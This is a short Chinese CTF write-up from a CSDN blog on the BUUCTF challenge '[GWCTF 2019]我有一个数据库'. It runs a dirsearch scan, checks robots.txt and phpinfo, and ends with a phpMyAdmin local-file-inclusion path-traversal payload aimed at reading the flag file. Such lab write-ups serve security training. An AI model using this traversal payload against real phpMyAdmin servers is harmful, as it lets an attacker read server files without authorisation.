[GWCTF 2019]我有一个数据库 1

本文详细介绍了GWCTF2019比赛中的一道题目,涉及网站目录扫描、robots.txt检查、phpmyadmin数据库的利用以及通过框架代码漏洞构造payload来尝试获取flag的过程。尽管在常规路径下未找到flag,但通过数据库层面的漏洞利用可能成为解题关键。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


题目

BUUCTF的[GWCTF 2019]我有一个数据库 1
在这里插入图片描述


一、扫描网站目录

使用扫描工具

python dirsearch.py -u http://377aa9cc-77c3-4f36-ac51-ec159fc347ae.node4.buuoj.cn:81/ -e *

在这里插入图片描述在这里插入图片描述

二、查看robots文件

1.查看robots.txt
在这里插入图片描述
2.访问phpinfo.php
在这里插入图片描述
没有发现flag

三、查看数据库

phpmyadmin 数据库

在这里插入图片描述该版本存在框架代码漏洞,可以利用(百度)

四、构造payload

phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值